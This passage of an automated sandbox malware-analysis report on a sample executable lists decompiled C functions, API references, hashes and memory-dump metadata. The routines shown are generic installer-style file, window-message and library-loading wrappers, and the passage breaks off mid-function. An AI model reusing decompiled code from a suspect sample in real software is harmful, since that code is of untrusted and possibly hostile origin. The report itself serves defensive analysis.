                                                        • Instruction ID: 4c3df7556a0b034395016ee82922b733160aa74f7bc511f6187c6ec266d632ef
                                                        • Opcode Fuzzy Hash: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                        • Instruction Fuzzy Hash: 4DE0B6B4600209BFEB109BA4ED89F7F7BBCEB04604F504525BE59F2290E67498199A7C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 687 401389-40138e 688 4013fa-4013fc 687->688 689 401390-4013a0 688->689 690 4013fe 688->690 689->690 691 4013a2-4013ad call 401434 689->691 692 401400-401401 690->692 695 401404-401409 691->695 696 4013af-4013b7 call 40136d 691->696 695->692 699 4013b9-4013bb 696->699 700 4013bd-4013c2 696->700 701 4013c4-4013c9 699->701 700->701 701->688 702 4013cb-4013f4 MulDiv SendMessageA 701->702 702->688
                                                        C-Code - Quality: 59%
                                                        			E00401389(signed int _a4) {
                                                        				intOrPtr* _t6;
                                                        				void* _t8;
                                                        				void* _t10;
                                                        				signed int _t11;
                                                        				void* _t12;
                                                        				signed int _t16;
                                                        				signed int _t17;
                                                        				void* _t18;
                                                        
                                                        				_t17 = _a4;
                                                        				while(_t17 >= 0) {
                                                        					_t6 = _t17 * 0x1c +  *0x42f470;
                                                        					if( *_t6 == 1) {
                                                        						break;
                                                        					}
                                                        					_push(_t6); // executed
                                                        					_t8 = E00401434(); // executed
                                                        					if(_t8 == 0x7fffffff) {
                                                        						return 0x7fffffff;
                                                        					}
                                                        					_t10 = E0040136D(_t8);
                                                        					if(_t10 != 0) {
                                                        						_t11 = _t10 - 1;
                                                        						_t16 = _t17;
                                                        						_t17 = _t11;
                                                        						_t12 = _t11 - _t16;
                                                        					} else {
                                                        						_t12 = _t10 + 1;
                                                        						_t17 = _t17 + 1;
                                                        					}
                                                        					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                        						 *0x42ec0c =  *0x42ec0c + _t12;
                                                        						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ec0c, 0x7530,  *0x42ebf4), 0); // executed
                                                        					}
                                                        				}
                                                        				return 0;
                                                        			}











                                                        0x0040138a
                                                        0x004013fa
                                                        0x0040139b
                                                        0x004013a0
                                                        0x00000000
                                                        0x00000000
                                                        0x004013a2
                                                        0x004013a3
                                                        0x004013ad
                                                        0x00000000
                                                        0x00401404
                                                        0x004013b0
                                                        0x004013b7
                                                        0x004013bd
                                                        0x004013be
                                                        0x004013c0
                                                        0x004013c2
                                                        0x004013b9
                                                        0x004013b9
                                                        0x004013ba
                                                        0x004013ba
                                                        0x004013c9
                                                        0x004013cb
                                                        0x004013f4
                                                        0x004013f4
                                                        0x004013c9
                                                        0x00000000

                                                        APIs
                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                        • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                        • Instruction ID: 5c958b1953f7fe6cfac6f5d6f257cc34f78b067395a477e057d2c1298905e336
                                                        • Opcode Fuzzy Hash: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                        • Instruction Fuzzy Hash: F801D1317242209BE7195B79DD08B6A3698E710718F50823AF851F61F1DA78DC129B4D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 703 4052f0-405315 OleInitialize call 4041c7 706 405342-405359 call 4041c7 OleUninitialize 703->706 707 405317 703->707 709 40531a-40531f 707->709 711 405330-405338 709->711 712 405321-40532e call 401389 709->712 711->709 714 40533a 711->714 712->711 716 40533c 712->716 714->706 716->706
                                                        C-Code - Quality: 50%
                                                        			E004052F0(signed int __eax) {
                                                        				intOrPtr _v0;
                                                        				intOrPtr _t10;
                                                        				intOrPtr _t11;
                                                        				intOrPtr* _t12;
                                                        
                                                        				_t11 =  *0x42f468;
                                                        				_t10 =  *0x42f46c;
                                                        				__imp__OleInitialize(0);
                                                        				 *0x42f4f8 =  *0x42f4f8 | __eax;
                                                        				E004041C7(0);
                                                        				if(_t10 != 0) {
                                                        					_t12 = _t11 + 0xc;
                                                        					while(1) {
                                                        						_t10 = _t10 - 1;
                                                        						if(( *(_t12 - 4) & 0x00000001) != 0 && E00401389( *_t12, _v0) != 0) {
                                                        							break;
                                                        						}
                                                        						_t12 = _t12 + 0x418;
                                                        						if(_t10 != 0) {
                                                        							continue;
                                                        						} else {
                                                        						}
                                                        						goto L7;
                                                        					}
                                                        					 *0x42f4cc =  *0x42f4cc + 1;
                                                        				}
                                                        				L7:
                                                        				E004041C7(0x404); // executed
                                                        				__imp__OleUninitialize(); // executed
                                                        				return  *0x42f4cc;
                                                        			}







                                                        0x004052f1
                                                        0x004052f8
                                                        0x00405300
                                                        0x00405306
                                                        0x0040530e
                                                        0x00405315
                                                        0x00405317
                                                        0x0040531a
                                                        0x0040531a
                                                        0x0040531f
                                                        0x00000000
                                                        0x00000000
                                                        0x00405330
                                                        0x00405338
                                                        0x00000000
                                                        0x00000000
                                                        0x0040533a
                                                        0x00000000
                                                        0x00405338
                                                        0x0040533c
                                                        0x0040533c
                                                        0x00405342
                                                        0x00405347
                                                        0x0040534c
                                                        0x00405359

                                                        APIs
                                                        • OleInitialize.OLE32(00000000), ref: 00405300
                                                          • Part of subcall function 004041C7: SendMessageA.USER32(00030290,00000000,00000000,00000000), ref: 004041D9
                                                        • OleUninitialize.OLE32(00000404,00000000), ref: 0040534C
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: InitializeMessageSendUninitialize
                                                        • String ID:
                                                        • API String ID: 2896919175-0
                                                        • Opcode ID: 27348f06ce87f1f66077e23d5001c35af5604e3d0fe1afc9f40ed646d81b47df
                                                        • Instruction ID: d823475d3c08908343a682022f3e0037ab1e92dd3cc8d49a61ca0bec2af1321f
                                                        • Opcode Fuzzy Hash: 27348f06ce87f1f66077e23d5001c35af5604e3d0fe1afc9f40ed646d81b47df
                                                        • Instruction Fuzzy Hash: 75F090766006018AE3616B549D05B577370DFA0341F95413BFF48B32E0D6F5584A8E6D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00406500(signed int _a4) {
                                                        				struct HINSTANCE__* _t5;
                                                        				signed int _t10;
                                                        
                                                        				_t10 = _a4 << 3;
                                                        				_t8 =  *(_t10 + 0x40a240);
                                                        				_t5 = GetModuleHandleA( *(_t10 + 0x40a240));
                                                        				if(_t5 != 0) {
                                                        					L2:
                                                        					return GetProcAddress(_t5,  *(_t10 + 0x40a244));
                                                        				}
                                                        				_t5 = E00406492(_t8); // executed
                                                        				if(_t5 == 0) {
                                                        					return 0;
                                                        				}
                                                        				goto L2;
                                                        			}





                                                        0x00406508
                                                        0x0040650b
                                                        0x00406512
                                                        0x0040651a
                                                        0x00406526
                                                        0x00000000
                                                        0x0040652d
                                                        0x0040651d
                                                        0x00406524
                                                        0x00000000
                                                        0x00406535
                                                        0x00000000

                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                          • Part of subcall function 00406492: GetSystemDirectoryA.KERNEL32 ref: 004064A9
                                                          • Part of subcall function 00406492: wsprintfA.USER32 ref: 004064E2
                                                          • Part of subcall function 00406492: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                        • String ID:
                                                        • API String ID: 2547128583-0
                                                        • Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                        • Instruction ID: acae0596759e2787f84b09bdc6f4b17f60683fab7501ae0ee02ebffea3798694
                                                        • Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                        • Instruction Fuzzy Hash: F7E08672A0421177D2105A74BE0893B72A8DE89740302043EF546F2144D7389C71966D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 68%
                                                        			E00405C90(CHAR* _a4, long _a8, long _a12) {
                                                        				signed int _t5;
                                                        				void* _t6;
                                                        
                                                        				_t5 = GetFileAttributesA(_a4); // executed
                                                        				asm("sbb ecx, ecx");
                                                        				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                        				return _t6;
                                                        			}





                                                        0x00405c94
                                                        0x00405ca1
                                                        0x00405cb6
                                                        0x00405cbc

                                                        APIs
                                                        • GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\dY5HmgsBm6.exe,80000000,00000003), ref: 00405C94
                                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesCreate
                                                        • String ID:
                                                        • API String ID: 415043291-0
                                                        • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                        • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                                                        • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                        • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00405C6B(CHAR* _a4) {
                                                        				signed char _t3;
                                                        				signed char _t7;
                                                        
                                                        				_t3 = GetFileAttributesA(_a4); // executed
                                                        				_t7 = _t3;
                                                        				if(_t7 != 0xffffffff) {
                                                        					SetFileAttributesA(_a4, _t3 & 0x000000fe);
                                                        				}
                                                        				return _t7;
                                                        			}





                                                        0x00405c70
                                                        0x00405c76
                                                        0x00405c7b
                                                        0x00405c84
                                                        0x00405c84
                                                        0x00405c8d

                                                        APIs
                                                        • GetFileAttributesA.KERNELBASE(?,?,00405883,?,?,00000000,00405A66,?,?,?,?), ref: 00405C70
                                                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405C84
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                        • Instruction ID: e57869254d9b62c000b772120ebafc6e643eb49c03cb969dc299021a919e5f7f
                                                        • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                        • Instruction Fuzzy Hash: 67D0C972504521AFD2142728AE0889BBB55DB54271702CB36FDA5A26B1DB304C569A98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00405761(CHAR* _a4) {
                                                        				int _t2;
                                                        
                                                        				_t2 = CreateDirectoryA(_a4, 0); // executed
                                                        				if(_t2 == 0) {
                                                        					return GetLastError();
                                                        				}
                                                        				return 0;
                                                        			}




                                                        0x00405767
                                                        0x0040576f
                                                        0x00000000
                                                        0x00405775
                                                        0x00000000

                                                        APIs
                                                        • CreateDirectoryA.KERNELBASE(?,00000000,0040333B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405767
                                                        • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405775
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectoryErrorLast
                                                        • String ID:
                                                        • API String ID: 1375471231-0
                                                        • Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                        • Instruction ID: 5acf30d11c51c39224c83c09ee2e5989404a14e094893e30e7ab7d3df00569a4
                                                        • Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                        • Instruction Fuzzy Hash: 21C04C31244505EFD6105B30AE08F177A90AB50741F1644396186E10B0EA388455E96D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00405D08(void* _a4, void* _a8, long _a12) {
                                                        				int _t7;
                                                        				long _t11;
                                                        
                                                        				_t11 = _a12;
                                                        				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                        				if(_t7 == 0 || _t11 != _a12) {
                                                        					return 0;
                                                        				} else {
                                                        					return 1;
                                                        				}
                                                        			}





                                                        0x00405d0c
                                                        0x00405d1c
                                                        0x00405d24
                                                        0x00000000
                                                        0x00405d2b
                                                        0x00000000
                                                        0x00405d2d

                                                        APIs
                                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032FD,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405D1C
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                        • Instruction ID: 6bc3b1048b15a49576125e72cb6f14b4cec2b2626e36b687d4021167e808d8fe
                                                        • Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                        • Instruction Fuzzy Hash: 2BE08C3221021EABCF109E608C08EEB3B6CEF00360F048833FD54E2140D234E8209BA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00405D37(void* _a4, void* _a8, long _a12) {
                                                        				int _t7;
                                                        				long _t11;
                                                        
                                                        				_t11 = _a12;
                                                        				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                        				if(_t7 == 0 || _t11 != _a12) {
                                                        					return 0;
                                                        				} else {
                                                        					return 1;
                                                        				}
                                                        			}





                                                        0x00405d3b
                                                        0x00405d4b
                                                        0x00405d53
                                                        0x00000000
                                                        0x00405d5a
                                                        0x00000000
                                                        0x00405d5c

                                                        APIs
                                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032B3,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,00000004,00000000), ref: 00405D4B
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: FileWrite
                                                        • String ID:
                                                        • API String ID: 3934441357-0
                                                        • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                        • Instruction ID: 0f83f4d47d9459a9b0ba24ed2798b341cbbd10940215494d2392ac534f962254
                                                        • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                        • Instruction Fuzzy Hash: 41E08C3220025AABCF10AFA08C04EEB3B6CEF00360F008833FA15E7050D630E8219BA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E004041C7(int _a4) {
                                                        				struct HWND__* _t2;
                                                        				long _t3;
                                                        
                                                        				_t2 =  *0x42ebf8; // 0x30290
                                                        				if(_t2 != 0) {
                                                        					_t3 = SendMessageA(_t2, _a4, 0, 0); // executed
                                                        					return _t3;
                                                        				}
                                                        				return _t2;
                                                        			}





                                                        0x004041c7
                                                        0x004041ce
                                                        0x004041d9
                                                        0x00000000
                                                        0x004041d9
                                                        0x004041df

                                                        APIs
                                                        • SendMessageA.USER32(00030290,00000000,00000000,00000000), ref: 004041D9
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: b93bfa62a0d17583d47994c5deeb5958d6a7eb45b0bac583054f51af99654720
                                                        • Instruction ID: 4f5bfb943ccb7372f266285400f959559a3f08b639bcfa815988f1d16fb7a589
                                                        • Opcode Fuzzy Hash: b93bfa62a0d17583d47994c5deeb5958d6a7eb45b0bac583054f51af99654720
                                                        • Instruction Fuzzy Hash: A5C09BB17447017FEE20CB659D49F0777586750700F2544397755F60D4C674E461D61C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00403300(long _a4) {
                                                        				long _t2;
                                                        
                                                        				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                        				return _t2;
                                                        			}




                                                        0x0040330e
                                                        0x00403314

                                                        APIs
                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 0040330E
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID:
                                                        • API String ID: 973152223-0
                                                        • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                        • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                        • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                        • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E004041B0(int _a4) {
                                                        				long _t2;
                                                        
                                                        				_t2 = SendMessageA( *0x42f428, 0x28, _a4, 1); // executed
                                                        				return _t2;
                                                        			}




                                                        0x004041be
                                                        0x004041c4

                                                        APIs
                                                        • SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 52ed36bf426171ca8e77ff219833bebd4cd9702e05723d5fb87fa54f4c2163d0
                                                        • Instruction ID: 1318e1a831b13f4a694e23e2858010ee9933afb9cbbae162fbad06e3603bfc21
                                                        • Opcode Fuzzy Hash: 52ed36bf426171ca8e77ff219833bebd4cd9702e05723d5fb87fa54f4c2163d0
                                                        • Instruction Fuzzy Hash: A9B09236284A00ABDA215B50DE09F4A7A72A768701F408039B240250B0CAB200A5EB18
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E0040419D(int _a4) {
                                                        				int _t2;
                                                        
                                                        				_t2 = EnableWindow( *0x42a88c, _a4); // executed
                                                        				return _t2;
                                                        			}




                                                        0x004041a7
                                                        0x004041ad

                                                        APIs
                                                        • KiUserCallbackDispatcher.NTDLL(?,00403F79), ref: 004041A7
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: CallbackDispatcherUser
                                                        • String ID:
                                                        • API String ID: 2492992576-0
                                                        • Opcode ID: 79f4c344832d221aace4b62902680fcbf7870811690861caeb07dff72c7a6dc1
                                                        • Instruction ID: f9921b4c88a1a0ed6e9c6eedf741b01f94502565facb500019f25752580a62db
                                                        • Opcode Fuzzy Hash: 79f4c344832d221aace4b62902680fcbf7870811690861caeb07dff72c7a6dc1
                                                        • Instruction Fuzzy Hash: C5A011B2000000AFCB02AB00EF08C0ABBA2ABA0300B008838A280800388B320832EB0A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 78%
                                                        			E00401F7B() {
                                                        				void* _t8;
                                                        				void* _t12;
                                                        				void* _t14;
                                                        				void* _t16;
                                                        				void* _t17;
                                                        				void* _t20;
                                                        				void* _t22;
                                                        
                                                        				_t19 = E00402BCE(_t14);
                                                        				E0040521E(0xffffffeb, _t6); // executed
                                                        				_t8 = E00405796(_t19); // executed
                                                        				_t20 = _t8;
                                                        				if(_t20 == _t14) {
                                                        					 *((intOrPtr*)(_t22 - 4)) = 1;
                                                        				} else {
